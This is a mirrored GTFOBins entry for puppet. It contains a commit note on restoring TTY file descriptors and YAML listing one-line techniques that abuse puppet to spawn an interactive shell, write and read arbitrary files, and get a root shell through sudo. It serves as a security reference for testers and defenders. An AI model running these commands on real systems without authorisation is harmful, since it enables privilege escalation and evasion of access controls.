mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-10-23 00:57:56 +02:00
8eaf595fe6
Here the trick is to restore those file descriptors (0, 1, 2) that have been redirected (`dup2`) by the parent process. First we need to determine which one has been redirected, for example by looking at `ls -l /proc/$$/fd/`. Then we can use `0<&x`, `1>&x` or `2>&x` to restore 0, 1 or 2 respectively, where `x` is any file descriptor number that points to the TTY. It may happen that no file descriptor is unchanged, in that case we can use `tty` to perform the redirection: sh <$(tty) >$(tty) 2>$(tty)
20 lines
696 B
Markdown
20 lines
696 B
Markdown
---
|
|
functions:
|
|
execute-interactive:
|
|
- code: |
|
|
puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
|
|
file-write:
|
|
- description: The file path must be absolute.
|
|
code: |
|
|
export LFILE="/tmp/file_to_write"
|
|
puppet apply -e "file { '$LFILE': content => 'DATA' }"
|
|
file-read:
|
|
- description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
|
|
code: |
|
|
export LFILE=file_to_read
|
|
puppet filebucket -l diff /dev/null $LFILE
|
|
sudo-enabled:
|
|
- code: |
|
|
sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
|
|
---
|